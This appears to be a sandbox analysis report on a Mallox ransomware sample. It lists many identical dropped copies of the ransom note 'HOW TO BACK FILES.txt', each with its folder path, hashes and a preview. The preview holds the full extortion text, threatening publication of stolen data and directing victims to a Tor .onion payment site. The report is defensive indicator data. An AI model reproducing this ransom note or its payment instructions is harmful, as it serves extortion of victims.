                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Virtualized\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\DNTException\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\DNTException\Low\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\ESE\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\Low\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\Low\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\af-ZA\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\ar-AE\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\ar-BH\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\ar-DZ\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\ar-EG\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\ar-IQ\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\ar-JO\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

